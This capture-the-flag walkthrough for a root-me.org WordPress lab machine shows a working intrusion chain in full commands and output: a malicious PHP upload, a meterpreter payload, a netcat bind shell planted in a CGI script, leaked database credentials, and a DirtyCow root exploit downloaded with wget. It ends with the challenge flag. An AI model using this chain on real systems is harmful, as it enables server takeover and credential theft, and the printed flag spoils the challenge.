## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Realist, CTF
  User:
    mr_once
  Goal:
    Get the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.07.01  |
    | Firefox         | 79.0        |
    | Metasploit      | v5.0.99-dev |
    | searchsploit    | n/a         |
    | wpscan          | 3.8.3       |
  Machine information:
    Given I am accessing the machine at http://ctf06.root-me.org
    And it looks like a wordpress

  Scenario: Success:Information gathering with wpscan
    Given the site looks like a wordpress
    When I run "wpscan"
    """
    $ wpscan --url http://ctf06.root-me.org
    """
    Then I can see
    """
    ...
    [+] Upload directory has listing enabled:
        http://ctf06.root-me.org/wp-content/uploads/
        | Found By: Direct Access (Aggressive Detection)
        | Confidence: 100%
    ...
    """
    When I go to
    """
    http://ctf06.root-me.org/wp-content/uploads/
    """
    Then I can see [evidences](uploads.png)
    But none of the php files seems to work

  Scenario: Success:Find a way to upload files
    Given that I can access uploaded files as stated above
    And in the page I can see two sections "Contacts" and "Page d’exemple"
    When I go to "Contacts"
    """
    http://ctf06.root-me.org/contacts/
    """
    Then I can see an uploader [evidences](uploader.png)
    And if I try uploadind the file "test.php"
    And the code of "test.php" is
    """
    <?php
      phpinfo();
    ?>
    """
    When I upload the file
    Then not only I can't see any error but I can see the file on
    """
    http://ctf06.root-me.org/wp-content/uploads/
    """
    And it got renamed to "noid-test.php"
    When I go to
    """
    http://ctf06.root-me.org/wp-content/uploads/noid-test.php
    """
    Then I can see [evidences](phpinfo.png)

  Scenario: Success:Get a meterpreter session
    Given that now I can upload and execute php files on the server
    And I generate a payload using "msfvenom"
    """
    $ msfvenom -p php/meterpreter/bind_tcp -f raw > meterpreter.php
    """
    And I get meterpreter ready
    """
    $ msfconsole
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload php/meterpreter/bind_tcp
    msf5 exploit(multi/handler) > set RHOST ctf06.root-me.org
    msf5 exploit(multi/handler) > exploit
    [*] Started bind TCP handler against ctf06.root-me.org:4444
    """
    When I upload "meterpreter.php" and execut it
    Then I can see I get a meterpreter session [evidences](meterpreter.png)

  Scenario: Fail:Get a shell
    Given now I have a meterpreter session
    When I try to get a shell
    """
    meterpreter> shell
    """
    Then I can see the error
    """
    meterpreter > shell
    [-] stdapi_sys_process_execute: Operation failed: 1
    """
    And I can not get a shell

  Scenario: Success:Getting to know the website
    Given that I could not get a shell but i can move inside the site folders
    And I can see file's contents
    When I try to get more information about the page
    Then I can see the MySQL credentials stored in "../../wp-config.php"
    """
    $ cat wp-config.php
    ...
    define('DB_NAME', 'wp_sambox2');
    define('DB_USER', 'wp_sambox2');
    define('DB_PASSWORD', 'rXFAJqYJCSPfbWaK');
    ...
    """
    And in "../../../" I can see two folders "html" and "cgi-bin"
    And inside "cgi-bin" I found the file "4dm1n_3nv_cg1.cgi"
    """
    meterpreter > cat 4dm1n_3nv_cg1.cgi
    #!/bin/bash
    echo -e "Content-Type: text/html\n\n";
    echo "<pre>"
    env
    echo "</pre>";
    """
    When I go to
    """
    http://ctf06.root-me.org/cgi-bin/4dm1n_3nv_cg1.cgi
    """
    Then I can see the enviromental variables gets shown [evidences](cgi.png)

  Scenario: Success:Using the cgi file to get a shell
    Given that I can execute the cgi script
    And with my meterpreter session I can modify files
    When I change the content of the file in order to get a shell
    """
    #!/bin/bash
    echo -e "Content-Type: text/html\n\n";
    echo "<pre>"
    nc -nlvp 5005 -e /bin/bash
    echo "</pre>";
    """
    Then after executing the script
    When I access via netcat
    """
    $ nc ctf06.root-me.org 5005
    $ python -c 'import pty;pty.spawn("/bin/bash")'
    """
    Then I get a shell
    """
    bash-4.2$ id
    uid=48(apache) gid=48(apache) groups=48(apache)
    """

  Scenario: Fail:Privilege scalation MySQL
    Given now I have a shell
    When I look for the MySQL version
    """
    $ mysql --version
    """
    Then I get
    """
    mysql Ver 15.1 Distrib 5.5.35-MariaDB, for Linux (x86_64)using readline 5.1
    """
    And using "searchsploit" I found the exploit
    """
    $ searchsploit mariadb
    ...
    MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System
    User Privilege Escalation / Race Condition
    ...
    """
    But it needs to be ran as "mysql"
    And if I login
    """
    mysql -u wp_sambox2 -p
    Enter password: rXFAJqYJCSPfbWaK

    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 59
    Server version: 5.5.35-MariaDB MariaDB Server

    Copyright (c) 2000, 2013, Oracle, Monty Program Ab and others.

    Type 'help;'or '\h' for help. Type'\c' to clear the current input statement

    MariaDB [(none)]>
    """
    When I run
    """
    MariaDB [(none)]> \! id
    uid=48(apache) gid=48(apache) groups=48(apache)
    """
    Then I can not use the exploit

  Scenario: Fail:Wrong kernel exploit
    Given the MySQL exploit did not work
    Then I try to exploit the kernel
    And the kerlnel's version is
    """
    $ uname -r
    3.10.0-123.el7.x86_64
    """
    When I use "searchsploit"
    """
    $ searchsploit kernel 3.10.0 | grep linux | grep -v dos
    """
    Then I found several exploits [evidences](exploits.png)
    But none of them worked bucause of kernel's version or OS

  Scenario: Fail:Wrong dirtycow exploit
    Given the above methods dit not worked
    And I found that the kernel might be vulnerable to "dirtycow"
    When I go to
    """
    https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
    """
    Then I found a list of exploits
    And I tried several of them
    But after compiling and executing them the exploit takes for ever
    And the conection closes

  Scenario: Success:Right dirtycow exploit
    Given that the aforementioned exploits did not worked
    When I found this one, verified
    """
    https://www.exploit-db.com/exploits/40616
    """
    Then I decide to give it a try
    And I download it to the machine
    """
    $ cd /tmp
    $ wget https://www.exploit-db.com/download/40616
    $ mv 40616 cowroot.c
    """
    But when I try to compile it I get the error
    """
    $ gcc cowroot.c -o cowroot -pthread
    In file included from cowroot.c:28:0:
    /usr/include/unistd.h:334:16: note: expected '__off_t' but argument is \
    of type 'void *'
    extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
    """
    And I fix it by changing the 98 line for
    """
    lseek(f,(__off_t)map,SEEK_SET);
    """
    When I compile and run the exploit
    Then I get a root shell
    """
    DirtyCow root privilege escalation
    Backing up /usr/bin/passwd to /tmp/bak
    Size of binary: 27832
    Racing, this may take a while..
    /usr/bin/passwd overwritten
    Popping root shell.
    Don't forget to restore /tmp/bak
    thread stopped
    thread stopped
    [root@samboxv2 cgi-bin]#
    """

  Scenario: Success:Read the flag
    Given now I am root
    When I try to read the flag
    """
    cat /passwd
    """
    Then I get it
    """
    1c9a5ac2f03b365fea71a9fa2dbd5f8e
    """
    And I solve the challenge
